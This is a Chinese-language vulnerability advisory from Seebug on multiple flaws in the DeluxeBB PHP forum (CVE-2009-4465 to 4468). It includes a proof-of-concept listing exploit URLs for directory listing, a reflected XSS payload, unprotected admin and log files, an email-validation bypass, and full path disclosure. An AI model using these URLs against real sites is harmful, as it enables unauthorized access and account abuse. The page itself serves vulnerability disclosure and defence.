DeluxeBB存在多个安全漏洞

2010-01-0600:00:00

Root

www.seebug.org

EPSS

0.007

Percentile

80.9%

JSON

Bugraq ID: 37448
CVE ID：CVE-2009-4465
CVE-2009-4466
CVE-2009-4467
CVE-2009-4468

DeluxeBB是一款基于PHP的论坛程序。
DeluxeBB存在多个输入验证问题，远程攻击者可以利用漏洞进行跨站脚本，验证绕过和安全绕过等攻击。
具体漏洞如下：
-部分管理控制面板文件不受访问保护。
-部分日志文件不受访问保护。
-在用户注册过程之后，简单的发送特殊链接，可绕过邮件注册校验。
-通过访问邮件列表字段的末页获得[USER_ID]
-存在路径泄漏问题。

DeluxeBB <= 1.3
目前没有解决方案提供：
http://www.deluxebb.com/main.php?content=news


                                                # Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com&lt;http://gmail.com&gt;
# Vendor: http://www.deluxebb.com
#
#[Directory Listing]
http://server/templates/
http://server/images/
http://server/logs/
http://server/wysiwyg/
http://server/docs/
http://server/classes
http://server/lang
http://server/settings/
#
#
#[Cross Site Scripting]
http://server/misc.php?sub=memberlist&amp;page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E
#
#
#[Unprotected Admin Panel Files]
http://server/templates/deluxe/admincp/
http://server/templates/corporate/admincp/
http://server/templates/blue/admincp/
#
#
#[Unprotected Log Files]
http://server/logs/cp.php
#
#
#[Mail Registration Validation Bypass]
After the user registration procedure, Simply enter to the link:
http://server/misc.php?sub=valemail&amp;valmem=[USER_ID]&amp;valnum=cp77fk4r
you can get your [USER_ID] on the last page of Member-List section:
http://server/misc.php?sub=memberlist&amp;page=[LAST_PAGE]
#
#
#
#[Full Path Disclosure]
http://server/misc.php?sub=memberlist&amp;page=-11111111111111111
-you'll get an error like:
Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..]
 
or:
http://server/misc.php?sub=memberlist&amp;page=-1.11111111111111E+FF
-you'll get an error like:
Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..]
#
#
#[E0F]

EPSS

0.007

Percentile

80.9%

JSON

Related for SSV:15195